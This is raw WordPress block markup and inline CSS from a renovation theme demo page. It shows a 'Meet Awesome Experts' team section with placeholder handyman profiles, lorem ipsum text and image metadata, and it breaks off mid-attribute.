{\"contentWidth\":\"full_width\",\"blockId\":\"8eaee92e-e616-46a2-9d4a-e683aac6ce2a\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-7\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-7 skt-blocks-block-section-outer-wrap block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"4bf804fe-a71c-426e-8620-9384e3ade2ba\"} -->\n<style type=\"text/css\"> .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-4bf804fe-a71c-426e-8620-9384e3ade2ba skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingTablet\":30,\"blockId\":\"a230e795-4950-475e-91e7-72865fef243e\"} -->\n<style type=\"text/css\"> .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-a230e795-4950-475e-91e7-72865fef243e\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7efc2986-5992-4078-a8f0-585e7384483c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":17,\"headingTitleFontSizeTablet\":17,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7efc2986-5992-4078-a8f0-585e7384483c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Leaderships</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Meet Awesome<br>Experts</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"29fe60f7-45c5-43bc-9f5b-528bb0f13ac2\"} -->\n<style type=\"text/css\"> .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All Team Member\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\",\"counterId\":\"a982759b-8eb1-4278-8e6d-30ac05e73771\",\"vPadding\":20,\"hPadding\":30,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#ff5e14\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":17,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"500\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 20px; padding-bottom: 20px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 30px; padding-right: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 17px; font-family: Poppins; font-weight: 500; line-height: undefined; opacity: 1; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #ff5e14; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 17px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\">View All Team Member</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"count\":4,\"gutter\":\"small\",\"designationColor\":\"#494848\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"titleFontSize\":20,\"imageMarginTop\":50,\"imageMarginBottom\":20,\"titleSpacing\":0,\"imageWidth\":260,\"borderWidth\":0,\"borderRadius\":0,\"padding\":0,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left top\",\"showDescription\":false,\"showSocialIcons\":false} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-4-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left 